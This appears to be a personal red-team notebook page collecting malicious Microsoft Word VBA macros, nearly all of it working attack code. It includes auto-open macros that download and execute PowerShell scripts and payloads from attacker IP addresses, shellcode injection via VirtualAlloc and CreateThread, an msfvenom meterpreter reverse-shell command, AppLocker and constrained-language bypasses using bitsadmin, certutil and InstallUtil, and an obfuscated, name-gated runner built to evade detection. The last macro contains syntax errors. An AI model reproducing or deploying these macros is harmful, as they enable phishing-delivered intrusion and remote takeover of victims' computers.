MS Office
Thursday, June 18, 2020
12:02 PM
Backlink: reference-notes-readme
MS Word Macro Attack
VBA Direct Method
Macro Templates
Open Application
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.49.246/run.ps1') | IEX"
Shell str, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
CreateNewThread
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
buf = Array(252, 232, ..., 213)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Office will execute in 32-bit context. Generate meterpreter shellcode in C# to get output suitable for encryption Helper binary.
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.49.250 lport=443 -f csharp
Copy/paste the entire output into the source code for Helper.
Save the document as <App> 97-2003 Document for the default file extension. (Word 97-2003 Document = .doc; Excel 97-2003 Document = .xls; etc.), or as Macro-Enabled document for the .docm/.xlsm extension etc.
Dechained from Word Process
Sub MyMacro()
' Delete all comments before saving macro
' logonScript.txt is the compiled exe from the InstallUtil bypass project
strArg = "C:\Windows\System32\cmd.exe /C bitsadmin /Transfer myJob http://192.168.49.120/logonScript.txt C:\users\ted\appdata\logonScript && certutil -f -decode C:\users\ted\appdata\logonScript C:\users\ted\appdata\logonScript.exe && del C:\users\ted\appdata\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\users\ted\appdata\logonScript.exe"
GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
The vba code above uses the InstallUtil AppLocker bypass method with the dechain technique to achieve code execution.
Obsfucated VBA Runner
Use runner_doc-generate_payload.ps1 to generate the payload used in the code below. Same for the GetObject function, which is the encrypted version of the Create Win32_Process line used in the other VBA macro examples.
Function Pears(Beets)
Pears = Chr(Beets - 67)
End Function
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
Function Nuts(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Nuts = Oatmilk
End Function
Function MyMacro()
Dim Apples As String
Dim Water As String
If ActiveDocument.Name <> Nuts("181184177177168181113167178166") Then
Exit Function
End If
Apples = "179178186168181182171168175175099112168187168166099165188179164182182099112177178179099112186172177167178186182183188175168099171172167167168177099112166099172168187107107177168186112178165173168166183099182188182183168176113177168183113186168165166175172168177183108113167178186177175178164167182183181172177170107106171183183179125114114116124117113116121123113119124113117115120114181184177113183187183106108108"
Water = Nuts(Apples)
GetObject(Nuts("186172177176170176183182125")).Get(Nuts("154172177118117162147181178166168182182")).Create Water, Tea, Coffee, Napkin
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Renamed Obsfucated VBA Runner
Function argOne(argTwo)
argOne = Chr(argTwo - 67)
End Function
Function argThree(argFour)
argThree = Left(argFour, 3)
End Function
Function argFive(argSix)
argFive = Right(argSix, Len(argSix) - 3)
End Function
Function argSeven(argEight)
Do
argNine = argNine + argOne(argThree(argEight))
argEight = argFive(argEight)
Loop While Len(argEight) > 0
argSeven = argNine
End Function
Function MyMacro()
Dim argTen As String
Dim argEleven As String
If ActiveDocument.Name <> argSeven("181184177177168181113167178166") Then
Exit Function
End If
argTen = "179178186168181182171168175175099112168187168166099165188179164182182099112177178179099112186172177167178186182183188175168099171172167167168177099112166099172168187107107177168186112178165173168166183099182188182183168176113177168183113186168165166175172168177183108113167178186177175178164167182183181172177170107106171183183179125114114116124117113116121123113119124113117115120114181184177113183187183106108108"
argEleven = argSeven(argTen)
GetObject(argSeven("186172177176170176183182125")).Get(argSeven("154172177118117162147181178166168182182")).Create argEleven, argTwelve, argThirteen, argFourteen
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Substitute Page
Sub MyMacro()
'
' MyMacro Macro
'
'
Dim enc As String
Dim clear As String
Dim test As String
Dim rngParagraphs As Range
'ActiveDocument.Content.Select
'Text = Selection
'enc = Base64Encode(Selection, False)
'Selection.Delete
'ActiveDocument.Content.InsertAfter enc
Set rngParagraphs = ActiveDocument.Range( _
Start:=ActiveDocument.Paragraphs(5).Range.Start, _
End:=ActiveDocument.Paragraphs(5).Range.End)
rngParagraphs.Select
'ActiveDocument.Paragraphs(4).Select
enc = Selection
clear = Base64Decode(enc, False)
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter clear
End Sub
' Base64-encodes the specified string.
' Parameter fAsUtf16LE determines how the input text is encoded at the
' byte level before Base64 encoding is applied.
' * Pass False to use UTF-8 encoding.
' * Pass True to use UTF-16 LE encoding.
Function Base64Encode(ByVal sText, ByVal fAsUtf16LE)
' Use an aux. XML document with a Base64-encoded element.
' Assigning the byte stream (array) returned by StrToBytes() to .NodeTypedValue
' automatically performs Base64-encoding, whose result can then be accessed
' as the element's text.
With CreateObject("Msxml2.DOMDocument").CreateElement("aux")
.DataType = "bin.base64"
If fAsUtf16LE Then
.NodeTypedValue = StrToBytes(sText, "utf-16le", 2)
Else
.NodeTypedValue = StrToBytes(sText, "utf-8", 3)
End If
Base64Encode = .Text
End With
End Function
' Decodes the specified Base64-encoded string.
' If the decoded string's original encoding was:
' * UTF-8, pass False for fIsUtf16LE.
' * UTF-16 LE, pass True for fIsUtf16LE.
Function Base64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)
Dim sTextEncoding
If fIsUtf16LE Then sTextEncoding = "utf-16le" Else sTextEncoding = "utf-8"
' Use an aux. XML document with a Base64-encoded element.
' Assigning the encoded text to .Text makes the decoded byte array
' available via .nodeTypedValue, which we can pass to BytesToStr()
With CreateObject("Msxml2.DOMDocument").CreateElement("aux")
.DataType = "bin.base64"
.Text = sBase64EncodedText
Base64Decode = BytesToStr(.NodeTypedValue, sTextEncoding)
End With
End Function
' Returns a binary representation (byte array) of the specified string in
' the specified text encoding, such as "utf-8" or "utf-16le".
' Pass the number of bytes that the encoding's BOM uses as iBomByteCount;
' pass 0 to include the BOM in the output.
Function StrToBytes(ByVal sText, ByVal sTextEncoding, ByVal iBomByteCount)
' Create a text string with the specified encoding and then
' get its binary (byte array) representation.
With CreateObject("ADODB.Stream")
' Create a stream with the specified text encoding...
.Type = 2 ' adTypeText
.Charset = sTextEncoding
.Open
.WriteText sText
' ... and convert it to a binary stream to get a byte-array
' representation.
.Position = 0
.Type = 1 ' adTypeBinary
.Position = iBomByteCount ' skip the BOM
StrToBytes = .Read
.Close
End With
End Function
' Returns a string that corresponds to the specified byte array, interpreted
' with the specified text encoding, such as "utf-8" or "utf-16le".
Function BytesToStr(ByVal byteArray, ByVal sTextEncoding)
If LCase(sTextEncoding) = "utf-16le" Then
' UTF-16 LE happens to be VBScript's internal encoding, so we can
' take a shortcut and use CStr() to directly convert the byte array
' to a string.
BytesToStr = CStr(byteArray)
Else ' Convert the specified text encoding to a VBScript string.
' Create a binary stream and copy the input byte array to it.
With CreateObject("ADODB.Stream")
.Type = 1 ' adTypeBinary
.Open
.Write byteArray
' Now change the type to text, set the encoding, and output the
' result as text.
.Position = 0
.Type = 2 ' adTypeText
.Charset = sTextEncoding
BytesToStr = .ReadText
.Close
End With
End If
End Function
Sub MyMacro2()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.110/msfstaged.exe', 'msfstaged.exe')"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.Path + "\msfstaged.exe"
Wait (2)
Shell exePath, vbHide
End Sub
Sub Document_Open()
MyMacro
MyMacro2
End Sub
Sub AutoOpen()
MyMacro
End Sub
The above code also needs the .doc file set up with the correct text in the correct locations to work properly.
InstallUtil CLM Bypass
Sub MyMacro()
strArg = "powershell iwr -uri http://192.168.49.108/CLM_Bypass.exe -outfile C:\\Windows\\Tasks\\CLM_Bypass.exe;c:\\Windows\\Microsoft.NET\\Framwork64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\CLM_Bypass.exe"
GetObject("winmgmts:".Get("Win32_Process")/Create strArg, Null, Null, pid)
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub